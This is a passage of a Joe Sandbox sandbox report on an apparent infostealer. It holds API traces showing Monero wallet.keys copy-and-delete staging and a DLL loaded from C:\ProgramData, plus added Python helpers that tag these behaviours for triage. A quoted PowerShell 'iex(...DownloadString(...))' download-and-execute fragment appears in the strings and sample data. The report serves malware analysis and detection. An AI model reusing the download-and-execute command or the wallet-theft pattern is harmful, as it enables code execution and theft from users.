                                    • Instruction ID: 58ea95d1260b78ef7abb8a51f02beb3c5617c6c2437799599f26b2330303532c
                                    • Opcode Fuzzy Hash: 1c16980053b4c5b757dce83f8759dd026af0ab341c9aecc7dbfc6e5a3765a805
                                    • Instruction Fuzzy Hash: 8D2172B1A44204AFDB00DFD4DD55FAEBBB8FB49B14F108259FA05A7280D7B59900CBA5
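The function blocks on this page list raw API calls with hex arguments and leave the behavioural reading to the analyst. The following is an added triage helper, not Joe Sandbox code and not part of the report: it parses the report's own "APIs" bullet format ("Name.MODULE(arg,...), ref: ADDR") and the "$"-separated "String ID" field, decodes the registry constants the report prints as raw hex (0x80000002 is HKEY_LOCAL_MACHINE; 0x20119 is KEY_READ | KEY_WOW64_64KEY, i.e. a 32-bit process reading the 64-bit registry view, consistent with the SysWOW64 powershell.exe path), and assigns behaviour tags from call sequences such as GetSystemTime/sscanf/SystemTimeToFileTime/ExitProcess. The rule set and tag wording are this example's own heuristics; the SAMPLE_* inputs are copied verbatim from function blocks in this report.

```python
"""Behaviour tagging for Joe Sandbox function-level API listings (added example)."""
import re
from dataclasses import dataclass, field

API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"          # lstrcpy.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"                  # optional (arg,arg,...)
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"    # optional ", ref: 001A6C0C"
)
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# Access-mask bits from winreg.h; KEY_READ (0x20019) is tried first so that
# 0x20119 decodes as KEY_READ | KEY_WOW64_64KEY rather than five loose bits.
KEY_FLAGS = [(0x20019, "KEY_READ"), (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"),
             (0x4, "KEY_CREATE_SUB_KEY"), (0x8, "KEY_ENUMERATE_SUB_KEYS"),
             (0x10, "KEY_NOTIFY"), (0x100, "KEY_WOW64_64KEY"),
             (0x200, "KEY_WOW64_32KEY"), (0x20000, "READ_CONTROL")]
WRITABLE_DIRS = ("c:\\programdata\\", "c:\\users\\", "\\appdata\\", "\\temp\\")


@dataclass
class Call:
    name: str
    module: str
    args: list = field(default_factory=list)
    ref: str = ""


def parse_apis(text):
    """Parse the bullet lines of an 'APIs' section into Call objects."""
    calls = []
    for m in API_RE.finditer(text):
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        calls.append(Call(m.group("name"), m.group("module"), args, m.group("ref") or ""))
    return calls


def split_string_id(s):
    """The report joins strings with '$'; a literal '$' inside a string is ambiguous."""
    return [p for p in s.split("$") if p]


def decode_access(mask):
    """Render a registry access mask as flag names."""
    names = []
    for bit, name in KEY_FLAGS:
        if mask & bit == bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(hex(mask))
    return " | ".join(names) or "0"


def as_int(tok):
    try:
        return int(tok, 16)          # report arguments are hex
    except ValueError:
        return None                  # '?' marks an unresolved value


def tag_function(calls, strings=()):
    """Return behaviour tags (heuristic) for one function block."""
    names = {c.name for c in calls}
    tags = []
    if {"GetSystemTime", "sscanf", "SystemTimeToFileTime", "ExitProcess"} <= names:
        tags.append("date gate: parses a date string, compares it with the current time, then exits")
    if {"GetModuleFileNameA", "ShellExecuteEx", "ExitProcess"} <= names:
        tags.append("hands its own path to ShellExecuteEx, then exits (relaunch/cleanup pattern)")
    for c in calls:
        if c.name == "RegOpenKeyExA" and len(c.args) >= 4:
            root, access = as_int(c.args[0]), as_int(c.args[3])
            acc_s = decode_access(access) if access is not None else c.args[3]
            tags.append(f"registry read: {HKEYS.get(root, c.args[0])} opened with {acc_s}")
        if c.name == "LoadLibraryA" and c.args and any(d in c.args[0].lower() for d in WRITABLE_DIRS):
            tags.append(f"loads DLL from user-writable path: {c.args[0]}")
    joined = " ".join(strings)
    if ("DownloadString(" in joined or "iex(" in joined) and "powershell.exe" in joined.lower():
        tags.append("PowerShell download-and-execute (iex of DownloadString result)")
    if "SysWOW64" in joined:
        tags.append("32-bit process (SysWOW64 path)")
    return tags


# Inputs copied from function blocks in this report.
SAMPLE_DATE_GATE = """
• GetSystemTime.KERNEL32(?), ref: 001A6C0C
• sscanf.NTDLL ref: 001A6C39
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001A6C52
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001A6C60
• ExitProcess.KERNEL32 ref: 001A6C7A
"""
SAMPLE_REGISTRY = """
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7FC7
• RtlAllocateHeap.NTDLL(00000000), ref: 001A7FCE
• RegOpenKeyExA.ADVAPI32(80000002,00E1B850,00000000,00020119,?), ref: 001A7FEE
• RegQueryValueExA.ADVAPI32(?,00E2DE68,00000000,00000000,000000FF,000000FF), ref: 001A800F
• RegCloseKey.ADVAPI32(?), ref: 001A8022
"""
SAMPLE_LOADLIB = "• LoadLibraryA.KERNEL32(C:\\ProgramData\\chrome.dll), ref: 0019A098"
SAMPLE_STRING_ID = ("')\"$-nop -c \"iex(New-Object Net.WebClient).DownloadString('$<$"
                    "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")

if __name__ == "__main__":
    for label, text in (("date gate", SAMPLE_DATE_GATE), ("registry", SAMPLE_REGISTRY),
                        ("loadlib", SAMPLE_LOADLIB)):
        print(label, tag_function(parse_apis(text)))
    print("powershell", tag_function([], split_string_id(SAMPLE_STRING_ID)))
```

The 0x104 passed to RtlAllocateHeap in the registry block is MAX_PATH (260), and RegQueryValueExA is given 0xFF as the buffer size, so the value read is a short string. Treat the tags as hypotheses to confirm in the disassembly, not as verdicts: the heuristics key on call sets, and a benign updater can legitimately produce the ShellExecuteEx/ExitProcess pattern.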
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0019A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: 8cabc9ded9b93094248c44a47283054f87d71f762aaa230734dc19cae0122339
                                    • Instruction ID: 6b63f378fefa2a2c282c576310e61bdf68156450f82a9e69e3c4076f7df632c4
                                    • Opcode Fuzzy Hash: 8cabc9ded9b93094248c44a47283054f87d71f762aaa230734dc19cae0122339
                                    • Instruction Fuzzy Hash: 7DF09AB068D210BFDB01AB60EC04B6236E8EB0574CF900435F005932A0E3F5A8C8CBBB
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001A96AE,00000000), ref: 001A8EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A8EF2
                                    • wsprintfW.USER32 ref: 001A8F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 612d87a3f92d1b647b45bdc996422f2d60f198fbc3b362483f6a08ae5ddb081f
                                    • Instruction ID: 230eff588ad4f101e5b8a86e263665c2952ea35079e0bc3c3c292e1a78775d17
                                    • Opcode Fuzzy Hash: 612d87a3f92d1b647b45bdc996422f2d60f198fbc3b362483f6a08ae5ddb081f
                                    • Instruction Fuzzy Hash: B2E08CB4A48308BBDB00CB94DD0AEAD7BB8EB09705F0001A5FD0987340EAB19E008B96
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0019AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 0019ADEC
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 17b4950cacb15b6d572b1f2bafdab74a12302aece3623db72cb9c8f0eec01491
                                    • Instruction ID: b9050f8def2a50cf918c9fd334bca921d2c2560a6ade5f1876007b306cf24640
                                    • Opcode Fuzzy Hash: 17b4950cacb15b6d572b1f2bafdab74a12302aece3623db72cb9c8f0eec01491
                                    • Instruction Fuzzy Hash: 8DE1E076910118ABCB54FBA4DDA2EEE7339AF25300F908569F11672091EF707A4CCB76
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019D581
                                    • lstrlen.KERNEL32(00000000), ref: 0019D798
                                    • lstrlen.KERNEL32(00000000), ref: 0019D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 5d37fa709af5f6e9c6a80a5e3498d98db49e88ce663c560fbf242affea771be6
                                    • Instruction ID: ecce85c4ea670189ba08ad616707de37482593b9c283815a08ebf31f69e83411
                                    • Opcode Fuzzy Hash: 5d37fa709af5f6e9c6a80a5e3498d98db49e88ce663c560fbf242affea771be6
                                    • Instruction Fuzzy Hash: CB910176950108ABCB54FBA4DDA2EEE7339AF65300F908569F11672091EF707A08CB76
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019D901
                                    • lstrlen.KERNEL32(00000000), ref: 0019DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 0019DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0019DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 786542e8120bd17fadcdc9c80d38ea72bc232ab180d06cae39ec6faf1368c648
                                    • Instruction ID: ca8a58787ade5521a53e697de3f550e90e8b736ddbdc864350eff5031afc7c68
                                    • Opcode Fuzzy Hash: 786542e8120bd17fadcdc9c80d38ea72bc232ab180d06cae39ec6faf1368c648
                                    • Instruction Fuzzy Hash: 3E810E76950108ABCF54FBA4DCA6EEE7339AF66300F804569F11667091EF707A08CB76
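The three functions above share one shape: helper routines build a path ending in \Monero\wallet.keys with lstrcpy/lstrcat, the function copies that file with CopyFileA, and it deletes the copy with DeleteFileA once it is done with it. Earlier, a stub loads C:\ProgramData\chrome.dll with LoadLibraryA, a DLL under a user-writable directory. As an added example (not part of the Joe Sandbox report and not code from the sample), the following Python parses lines in this report's "APIs" listing format into records and flags both behaviours. The sample lines are copied from the entries on this page; the function names, the extra wallet file name and the list of writable directories are my own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Sample input in the form of this report's "APIs" listing, copied from the
# function entries on this page (the wallet-copy function, the LoadLibraryA
# stub and the wsprintfW call). "Part of subcall function" marks a call made
# inside a callee rather than in the function itself.
SAMPLE_APIS = r"""
• Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
• Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
• Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0019AA11
• lstrlen.KERNEL32(00000000,00000000), ref: 0019AB2F
• DeleteFileA.KERNEL32(00000000), ref: 0019AE73
• LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0019A098
• wsprintfW.USER32 ref: 001A8F08
"""

API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"        # e.g. CopyFileA.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?,?\s*"         # argument list is optional (wsprintfW has none)
    r"ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                 # call-site address, parsed from the hex "ref:" field
    caller: Optional[str]    # subcall function address, None for a direct call


def parse_apis(text: str) -> List[ApiCall]:
    """Parse the report's API lines; headings and unrelated lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("caller")))
    return calls


# wallet.keys is the Monero wallet file this report names; wallet.dat is an
# assumed additional wallet file name and is not taken from the report.
WALLET_FILES = ("wallet.keys", "wallet.dat")
# Directories a standard user can write to (assumed list, not from the report).
# A DLL loaded from one of them was dropped at run time, not installed.
WRITABLE_DIRS = ("c:\\programdata\\", "c:\\users\\")


def find_patterns(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Flag wallet copy-then-delete sequences and DLL loads from writable dirs."""
    findings: Dict[str, List[str]] = {}
    wallet_hits = [c for c in calls
                   if any(w in a.lower() for a in c.args for w in WALLET_FILES)]
    copies = [c for c in calls if c.api.startswith("CopyFile") and c.caller is None]
    deletes = [c for c in calls if c.api.startswith("DeleteFile") and c.caller is None]
    # A direct CopyFile followed (by call-site address) by a direct DeleteFile,
    # in a function whose helpers build a wallet path: the wallet is staged
    # for exfiltration and the staging copy is removed afterwards.
    for cp in copies:
        later = [d for d in deletes if d.ref > cp.ref]
        if wallet_hits and later:
            findings.setdefault("wallet_copy_then_delete", []).append(
                f"CopyFileA@{cp.ref:08X} -> DeleteFileA@{later[0].ref:08X}")
    for c in calls:
        if c.api.startswith("LoadLibrary") and c.args:
            if c.args[0].lower().startswith(WRITABLE_DIRS):
                findings.setdefault("dll_from_writable_dir", []).append(c.args[0])
    return findings


if __name__ == "__main__":
    for name, hits in find_patterns(parse_apis(SAMPLE_APIS)).items():
        print(name, hits)
```

The ordering check uses the call-site address as a stand-in for control flow, which is what the report gives you without the disassembly; it is enough to separate "copy then delete" from a delete that happens before the copy, but a real analysis should confirm it in IDA or Ghidra on the snapshot file the report links.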
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: cfdcbb10ac53431cd15196d4436256acb5f3da394ab17f6db91687a0beb14046
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: A751AE72561307AFEB358F54C985BBA77A4FF15300F24412DE805469D2E7B1EDA0DB90
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0019A664
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
